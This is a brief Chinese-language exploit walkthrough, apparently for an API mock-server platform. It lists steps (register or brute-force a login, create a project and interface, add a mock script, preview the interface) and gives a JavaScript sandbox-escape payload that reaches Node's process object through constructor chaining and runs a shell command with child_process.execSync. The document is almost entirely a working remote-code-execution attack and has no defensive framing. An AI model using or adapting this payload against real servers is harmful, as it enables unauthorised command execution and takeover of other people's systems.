注冊或者爆破獲取用戶登錄權限登陸系統:
添加項目:

添加接口

添加mock腳本:
payload:
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

預覽里訪問接口


